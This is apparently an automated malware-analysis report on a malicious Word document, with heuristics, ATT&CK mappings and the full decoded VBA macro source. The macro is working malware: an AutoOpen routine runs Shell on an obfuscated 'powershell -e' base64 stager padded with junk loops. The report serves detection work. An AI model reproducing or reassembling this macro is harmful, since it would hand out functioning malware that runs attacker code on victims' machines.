Verdict: MALICIOUS
Risk Score: 150
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate the presence of code that can execute external commands. The Autoopen macro is present and calls a function that uses the Shell command, which strongly suggests the document is designed to download and execute a secondary payload.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Potential Shell call in VBA (critical) OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
  Next KhWtji = zEqPZXj + Shell(CuinjSSTfwc + Chr(pwWYOAbOHVC + vbKeyP + vZbLViJtXS) + "owers" + QJowm + ZtGESSiOtWf + mAoprfsVCz + PwMjP + wcokNEk, 88508 - 88508) For LvkmSK = YcmkZL To SNjWO
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  End Function Sub Autoopen() On Error Resume Next
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13517 bytes |

SHA-256 of macros.bas: ed6e7d571b60bc9d8437799222826922c35f02b35f96dcf185bc2fafecc850ba

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vibzwiHDALn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KhWtji()
On Error Resume Next
For wztpTV = VdtoTA To YjNvno
For jpfDYp = DmmwbV To 62560
FXjnv = (18964 / CBool(SrQksB) - iWJFT / Oct(23978 / Hex(20323) / lvjDS + Rnd(GpsfSB / Fix(37))))
Next
pMztSt = 43695 - 77588
Next
For nzurIQ = VCUMrm To HrrzLB
For FZzio = KMBTn To 49696
HiJbiq = (2054 / CBool(cwomD) - rBauK / Oct(75335 / Hex(27770) / XuIUGi + Rnd(BAZRn / Fix(37))))
Next
YhQQVA = 2423 - 55290
Next
KhWtji = zEqPZXj + Shell(CuinjSSTfwc + Chr(pwWYOAbOHVC + vbKeyP + vZbLViJtXS) + "owers" + QJowm + ZtGESSiOtWf + mAoprfsVCz + PwMjP + wcokNEk, 88508 - 88508)
For LvkmSK = YcmkZL To SNjWO
For zPUQqS = KdpnN To 10482
iNkTLz = (51048 / CBool(wfCHNS) - DldmBd / Oct(92954 / Hex(52231) / vAqQv + Rnd(zXTPjF / Fix(37))))
Next
QLRBVT = 80103 - 26999
Next
End Function
Sub Autoopen()
On Error Resume Next
For FCMaDJ = ESmlQY To GKjIf
For nwlsZV = VAIdl To 11046
uoEVj = (80491 / CBool(PwuTNr) - KqpKK / Oct(67017 / Hex(91799) / QTAir + Rnd(EKJAK / Fix(37))))
Next
QSGKY = 79914 - 66134
Next
KhWtji
For BqZMd = LJSSb To QoXkU
For wrLml = Cjjsk To 57935
UAXEau = (78205 / CBool(Zuurq) - nvcuV / Oct(81485 / Hex(43386) / qMPFGJ + Rnd(iSYofG / Fix(37))))
Next
sjzqf = 94709 - 46413
Next
End Sub
Attribute VB_Name = "QuutOlHzPnPdJL"
Function QJowm()
On Error Resume Next
For NQzJu = mYcvnd To FnXkhL
For FUDHaA = ljWqH To 8515
SqfWYP = (88761 / CBool(AjwSY) - lwIttT / Oct(98710 / Hex(86269) / qjuiB + Rnd(FFfZDm / Fix(37))))
Next
rOIwzE = 38096 - 43168
Next
njqMlEirf = "HeLL -e KA" + "BuAGUA" + "VwAtAG8AYgBqA" + "EUAYwBUA" + "CAAIABTA" + "HkAcw" + "B0A" + "GUATQAu" + "AGkA"
For HbFAl = wOlwZ To pmihtM
For aQtUJo = tkzVv To 48179
fbScAD = (84368 / CBool(RoGMU) - biOEs / Oct(47930 / Hex(91332) / OHwMiT + Rnd(RPBAl / Fix(37))))
Next
LLFsI = 5804 - 34904
Next
mCWkr = "bwAuAGMAbwBtAH" + "AAUgBFAFMAc" + "wBJAE8Abg" + "AuAGQAZQBGA" + "EwAQQBUAEUAcw" + "BUAHIAZQBhA" + "G0AK" + "AAgAFsASQBPAC4A" + "TQBlAE0ATwBS" + "AHkAUwBUAHIA"
For EOwTER = iQDAv To MLfnZX
For AYELis = SJLjV To 56434
KszsaB = (11669 / CBool(wwAqYw) - ZFifV / Oct(97004 / Hex(61354) / llMBn + Rnd(FTiSq / Fix(37))))
Next
SfuwV = 81744 - 34817
Next
CBhNRvpfE = "RQBhAG0AXQA" + "gAFsAYwBvAE4" + "AdgBFAHIAVABdAD" + "oAOgBGAFI" + "ATwBNAEIAYQBzA" + "EUA" + "NgA0AHMAV" + "ABSA" + "GkATgBnACgAI"
For GKrTSR = GAqHwi To OHOASI
For fWYivh = LkJfjF To 5975
ttiVpw = (35083 / CBool(KtYjRn) - VYJjbo / Oct(37681 / Hex(70143) / jpvQh + Rnd(QYfoNV / Fix(37))))
Next
wSuNj = 26693 - 79350
Next
mXWwcAiF = "AAnAFYAWgBC" + "AHQAVAA4AE" + "kAdwBGAEkA" + "WAAvAFMAagA4AHM" + "ARwBVAFQAcABCAE" + "EAUwBWAHgAUQ"
For wcXzo = XYcma To LlADB
For hdzDd = PCbqm To 26865
FvzlN = (44810 / CBool(tVtzD) - nMGKS / Oct(82996 / Hex(22328) / jMXuzw + Rnd(lfjmOh / Fix(37))))
Next
NMAnj = 69945 - 23131
Next
aJwdGR = "BUAGwAUgBVAGgA" + "RQBOAEMAU" + "ABoAGkANABuAHAA" + "eAB0ADEAVwA" + "2AE4AcQBsA" + "HYAVwBPAD" + "gAaABQADkAdQBCA" + "GM"
For jAzbl = wRXuC To ZicrNY
For IqMMpU = ztKfK To 52382
UcXuX = (25268 / CBool(oOJrLF) - ikJZHD / Oct(6479 / Hex(41498) / nKGSD + Rnd(GsjbK / Fix(37))))
Next
GFwqL = 98802 - 39261
Next
jbilCduqOw = "AV" + "AA0AH" + "AAYg" + "BuAHQAZ" + "QBVA"
For DUiPYU = BGDXO To FjkQui
For HRHkvp = fMiwE To 67217
USjrti = (88200 / CBool(ljDwG) - VMZQV / Oct(67852 / Hex(39572) / MtUizd + Rnd(XHTfFk / Fix(37))))
Next
EZBvr = 3590 - 60495
Next
wQOjaHrEA = "DUATw" + "A3ADMASABDAD" + "IA" + "ZQBBAGoAS" + "gBZADkARQBRAG" + "wAbABUADQ" + "AUgBJA" + "GkASgBKAH" + "IASgBoAGMAc"
QJowm = njqMlEirf + mCWkr + CBhNRvpfE + mXWwcAiF + aJwdGR + jbilCduqOw + wQOjaHrEA
End Function
Function ZtGESSiOtWf()
On Error Resume Next
For hwiWJz = fizYi To mXKlP
For OZjRB = EIzPZ To 84643
GlMVA = (51539 / CBool(pNbkf) - CLRBqK / Oct(52465 / Hex(71822) / BzhhF + Rnd(rJQJH / Fix(37))))
Next
bTaCK = 20329 - 92398
Next
uzFsrmquu = "AA4AHAAMwB3AF" + "IAYgBQADEAZgBD" + "AHIAWQB" + "HAEkAYQBOAHYAZ" + "wBI"
For AwwlVO = qwYPQh To kOnSVO
For DLbXZa = rzfzfK To 31911
wwMrM = (678 / CBool(rtqYm) - LPrphc / Oct(93467 / Hex(75075) / NvnBz + Rnd(tPlWYj / Fix(37))))
Next
rGiBw = 85274 - 38024
Next
ZrEDhid = "AFEATwB" + "ZAFUAOQB3AGs" + "ATwBnADcA" + "NgBRAG" + "8ARABnADUAWg"
For jBnHjj = KziTQb To QDLBMw
For FBNCvY = LfiETp To 63686
ztSPFF = (76796 / CBool(EQoIpa) - zfVEbz / Oct(50209 / Hex(9655) / LCzREP + Rnd(mBWDSi / Fix(37))))
Next
tYRNJm = 12572 - 29864
Next
ZbXfjtrABGZ = "AwAFUAOAB" + "TADgANAAzAGsAYw" + "BhADMAbABtADYAQ" + "QBJ" + "ADgA"
For kpjYzk = vZohD To GWkpT
For HTXYO = cfJlRS To 58561
HObXrz = (2746 / CBool(bddAtq) - vcUTE / Oct(14888 / Hex(53714) / RSqVF + Rnd(JIVDHv / Fix(37))))
Next
uNzUAM = 84706 - 88633
Next
lLJMjw = "SgBXAG" + "IAR" + "ABJAG" + "cAKwA4ADcAbA" + "BrAHAAeQA1A" + "EwAcQBSAGsATgB" + "rADEA" + "SABDAG0AMgB" + "aAGIAUgBTAE" + "cAWABlA"
For OolNOJ = zaofBK To AdwzS
For Iwlva = PWzDv To 69007
XDBjr = (63489 / CBool(LWdTP) - jIzqEM / Oct(49840 / Hex(49013) / RCqnNt + Rnd(AWsvin / Fix(37))))
Next
wuESR = 16792 - 72117
Next
DJXoTwLjj = "GEASAB6AFgAYQB2" + "AFkAdgBVAEMANgB" + "ZAEIASQB4A" + "EI" + "ASgA0AFYAUgBr"
For SfkRH = IwiJt To lztETG
For WGaUGw = wwAuH To 32227
wkLCw = (73944 / CBool(rYKlp) - PzAzz / Oct(21981 / Hex(45415) / MrKdU + Rnd(aMwoC / Fix(37))))
Next
jnOhCW = 38638 - 68212
Next
dULCwDuL = "AHQAcgBa" + "AG0AOABiAHQ" + "AMwB" + "nAEEA" + "bQA2AFIAOQBq" + "ADM" + "AWgBrA" + "HEASgBGAEoAW" + "QBGAEYAN"
For iQjRtr = vAuwtl To tAYcma
For ZWjNSb = Szdroj To 58536
bMbIcR = (96004 / CBool(FjwCUh) - thIAIu / Oct(99236 / Hex(7784) / PNcCRF + Rnd(BGTYM / Fix(37))))
Next
dwMbc = 57612 - 57124
Next
LvRVZRZtj = "wA3ADYAWA" + "A0AE0A" + "egAvAFAA" + "cABEAGIAOABBAFc" + "AeQBhADQ" + "AVgBDAFkASgBqA" + "HcAaw"
For ZQlUj = fiVfc To AsPpv
For AiwvBI = sEKoh To 34483
aFqwq = (67078 / CBool(vZSlnw) - AkiXj / Oct(1011 / Hex(57003) / YiOcCq + Rnd(UuoOG / Fix(37))))
Next
uCSwMu = 8875 - 9251
Next
WMEXBqZ = "BpAEY" + "ASwBOADUAY" + "QA4ADQAOABsAH" + "cAYQA" + "1ADQARgBoAH" + "gAdQA" + "yADcAVgBkA" + "DEAUQA4ADQAcw"
For JOLOsT = QARsbj To iNjrq
For YwZqV = iQYUG To 48134
vUzRow = (72490 / CBool(iowOHO) - jlfCOA / Oct(9594 / Hex(25457) / VsmlLs + Rnd(KSjlsi / Fix(37))))
Next
rtELuI = 54714 - 53676
Next
jHqwKmvSj = "B1AHAALwBiAG" + "wAegA3AE0" + "ARgB" + "HAGIAYgBCAF" + "MAdgB5AGE" + "AMw" + "BEADgAMQ" + "BHA" + "HYAVwBVAE" + "IAawArAH"
For rsjno = KuqGK To vLAhlI
For vadwBo = JJoKEN To 87673
vtiEqG = (15496 / CBool(ulYAwi) - dIzqj / Oct(75829 / Hex(27633) / fzBuBG + Rnd(CwCQPH / Fix(37))))
Next
hRino = 66660 - 25387
Next
LtBdmPGzO = "IAWAA4" + "AGsAYwBIAHUAZQ" + "A3AFkAMQBYAE" + "4AeQBSAGQAe" + "ABQADEA"
ZtGESSiOtWf = uzFsrmquu + ZrEDhid + ZbXfjtrABGZ + lLJMjw + DJXoTwLjj + dULCwDuL + LvRVZRZtj + WMEXBqZ + jHqwKmvSj + LtBdmPGzO
End Function
Function mAoprfsVCz()
On Error Resume Next
For nrbFKC = WNrhz To FpLGjO
For bwfSwa = iLtwfj To 5018
JTwvd = (95047 / CBool(oZiIDc) - SjIUiA / Oct(78193 / Hex(22739) / IkbWK + Rnd(sBSwt / Fix(37))))
Next
rJkllB = 19159 - 12183
Next
ibGmwQ = "NQA" + "2A" + "C8AWABu" + "AHUAbgBzAEEAS" + "ABYA" + "GoANQBV" + "AEcARgB"
For oWwGsM = LCBWzK To KBaPUj
For pGivaX = isziF To 49822
NdPRH = (3561 / CBool(QvWihV) - kKlpZ / Oct(2725 / Hex(97671) / QLRoT + Rnd(JCsslU / Fix(37))))
Next
XKzMfr = 49070 - 22689
Next
rALWY = "xAFUAV" + "gBaA" + "HgAZgBzAGQAaw" + "BQA"
For MtBzw = NpjYUw To EzSiM
For siqwA = MzncuJ To 48608
EwXnV = (59002 / CBool(oCMMzw) - Gwtwf / Oct(35759 / Hex(37025) / WzBUlj + Rnd(NlPvu / Fix(37))))
Next
GbfNi = 61792 - 6887
Next
ESrUqJVvPZ = "EMASgBUAGsA" + "WABVAD" + "kAMgBqADMAdQA" + "1AFAAZABkAEs"
For ijAiBt = iwiGkY To amAsrP
For azEEDz = OizmP To 9614
OAqkpk = (60154 / CBool(koJjfB) - MpoomD / Oct(73063 / Hex(93195) / wuTTP + Rnd(UVTjLl / Fix(37))))
Next
ICiJn = 24310 - 29570
Next
FihrwLJ = "AKw" + "BLAH" + "EA" + "VgBRAGI" + "ARABIAGs"
For TUUUWI = bSocDR To vQLYDU
For QvqHCj = JcQZhd To 59929
wzsYW = (87984 / CBool(ujhsW) - OwPIu / Oct(13317 / Hex(4380) / iMUbL + Rnd(pYDWn / Fix(37))))
Next
VSLfi = 97220 - 89778
Next
pFtwofJURsL = "AQQB" + "zADQAbwBuAGEAa" + "wBBAE4AWgB" + "kAEo" + "AcABYA" + "HAA"
For BGaJK = viAQmW To BUnYzK
For LVjKFP = vmjdwM To 73339
XmLQj = (43084 / CBool(XmkQd) - zYHho / Oct(36069 / Hex(9126) / aPDuvz + Rnd(RmqKqd / Fix(37))))
Next
AMjiFA = 96322 - 87694
Next
poRlriq = "TgBU" + "AG8AbABWAFAAMAB" + "DAG0AcwB" + "mAGE" + "AdQBWAFEAVABHAG" + "4ARgAvADk"
For olPzOc = HthrwX To WkWTG
For uFnrBY = AJNEhh To 78282
JfBdo = (80718 / CBool(RJmAdE) - tijrt / Oct(62325 / Hex(67105) / Ywqhwz + Rnd(cKPitM / Fix(37))))
Next
UqRJL = 78321 - 57471
Next
mSifZsARDU = "AMABDAGEA" + "cwAv" + "AEUAUABFAE0" + "ARQBy" + "ADMAcA" + "BlAFkASQ" + "B0AFYAVA" + "BaADUAcA" + "AwAHYAT"
mAoprfsVCz = ibGmwQ + rALWY + ESrUqJVvPZ + FihrwLJ + pFtwofJURsL + poRlriq + mSifZsARDU
End Function
Function PwMjP()
On Error Resume Next
For BuppQ = XpnIfK To FnGtk
For jbkvLz = NqZjUu To 39264
vvrGh = (3480 / CBool(UcaNC) - PDLQbD / Oct(95107 / Hex(56374) / wiscQ + Rnd(QDnlqm / Fix(37))))
Next
rOnCj = 52652 - 13883
Next
FkYMBK = "wB0AG" + "gA" + "RQBrAEMATwAzAG" + "QAVQAyA"
For Vwvow = OTtqWq To wNOElX
For YmbLM = LwcYU To 42462
Idfwn = (35059 / CBool(BjuvTw) - uBZzzD / Oct(5805 / Hex(69235) / WkcsbR + Rnd(UVAUWT / Fix(37))))
Next
RRTcCo = 84631 - 61730
Next
SHziDKWB = "HMAZwBTA" + "FgA" + "ZwBIAH" + "cANwBmACcAIA" + "ApACwAW" + "wBT" + "AFkAUwB0AGUATQ" + "AuAEkA" + "TwAuA" + "GMAbw"
For PaRvDa = STYuJ To KZTjs
For ZSbIb = IjibA To 90869
qsMSKW = (76208 / CBool(wiBwYY) - GtJSw / Oct(35483 / Hex(12456) / oRpbv + Rnd(rqScDS / Fix(37))))
Next
wGINF = 60114 - 51241
Next
stRpRZrE = "BtAFA" + "AcgBlAHM" + "AUwBp" + "AE8ATgAuA" + "EM" + "AbwB" + "tAHAAUg"
For aKCvDa = RizYkS To BUvsA
For riVVG = InAFqn To 61215
NGnjrT = (12717 / CBool(kdfhB) - EoRMi / Oct(37550 / Hex(84590) / phoTRw + Rnd(dIlEd / Fix(37))))
Next
vhPAj = 987 - 35572
Next
lzLlBuRd = "BFAHMAUwBpAE8" + "Ab" + "gBNAG8AZABFAF" + "0AOgA6AGQA"
PwMjP = FkYMBK + SHziDKWB + stRpRZrE + lzLlBuRd
End Function
Function wcokNEk()
On Error Resume Next
For rqYiji = niIMz To QGrYC
For IHVtd = OJGCM To 96478
ZszrQ = (70152 / CBool(PDpics) - pibXbi / Oct(84707 / Hex(18508) / WwvKUZ + Rnd(kRKtX / Fix(37))))
Next
TPboTs = 9965 - 33606
Next
cLUWLS = "RQB" + "DAG8" + "ATQ" + "BwAFIAZQB"
For QlrZif = kTaPBb To VZNqzE
For SwILL = wnKzE To 50501
fKTvua = (10821 / CBool(qSIcsU) - OFBHM / Oct(58726 / Hex(95966) / jNTTiz + Rnd(bLawO / Fix(37))))
Next
GSwXz = 60989 - 54279
Next
TpTBqWAT = "TAHMAKQB8AEY" + "ATwBSAGUAQQB" + "jAEgALQBPA" + "EIAagBlAEMAVAAg" + "AH" + "sAbgBlAFcALQBvA" + "GIAagBFAGMAVA" + "AgAHMAeQBTA"
For AjTrqY = zwNAh To jiaGX
For hqwBwF = HnFjNw To 41693
idAbr = (47378 / CBool(iONvj) - WjWQcw / Oct(89003 / Hex(80527) / iXlvQ + Rnd(sNABM / Fix(37))))
Next
AEZif = 20764 - 58439
Next
jzfaPEjb = "HQARQBtAC4Aa" + "QBPAC4AcwBUAH" + "IA" + "ZQBhAG0AUgBFAG" + "EARAB" + "lA"
For ioAYI = DjTlCb To fvdqw
For mlBMt = TWfwm To 93163
PdVtWN = (75247 / CBool(NItPzk) - VIwoj / Oct(5697 / Hex(84830) / jbHEoP + Rnd(mhoRL / Fix(37))))
Next
JBHcIc = 47776 - 56101
Next
CtMzZdpZjLX = "FIA" + "KAA" + "gACQ" + "AXwAsA" + "CAAWwBUAGUAeABU"
For zujQA = AzMiX To oRPIw
For pVMai = QLGoL To 51262
TzZiNU = (45613 / CBool(Bmjbi) - jUjsUK / Oct(22599 / Hex(68427) / vWLKA + Rnd(QLlmHE / Fix(37))))
Next
PnCoa = 3435 - 77272
Next
JnurER = "AC4AZQBO" + "AEMAbwBkAGkAT" + "gBn" + "AF0AOgA6AEEAcw"
For cwzlhr = wrQOj To iIBJXa
For bwpaji = wqfjJ To 91155
SXMYT = (94491 / CBool(OtVsUO) - fAiDbD / Oct(14476 / Hex(58056) / ZCCma + Rnd(MjFoR / Fix(37))))
Next
kpkEd = 82592 - 24558
Next
fcjtGGlGh = "BjAEkAS" + "QAgAC" + "kAIAB9ACAAKQAuA" + "HIARQBB" + "AE" + "QAd" + "ABPAEUAbgBkAC"
For ThOPS = pBjir To oOnWQ
For TIhon = zauLtw To 97095
uZpro = (74495 / CBool(IRLAW) - AXVCOo / Oct(35526 / Hex(44868) / WiuhS + Rnd(WdHhjf / Fix(37))))
Next
OZvid = 82832 - 21031
Next
ZorwWdsZQL = "gAIAApA" + "CAAfAAgAC4AKAAg" + "ACQA" + "RQBO" + "AHYAOgBjAE" + "8ATQBTA" + "FAARQ" + "BjAFsAN" + "AAsA"
For WoRkwC = JfKjp To CKwGUa
For nDSmRi = wGfKb To 23844
AqdzW = (80866 / CBool(UcXDqf) - OzcJQ / Oct(47680 / Hex(7609) / ViTRu + Rnd(CzAEcc / Fix(37))))
Next
UTIwk = 78162 - 35695
Next
GRmkIXV = "DEANQ" + "AsADIAN" + "QBdAC0ASgBvA" + "EkATgAnA" + "CcAKQA="
wcokNEk = cLUWLS + TpTBqWAT + jzfaPEjb + CtMzZdpZjLX + JnurER + fcjtGGlGh + ZorwWdsZQL + GRmkIXV
End Function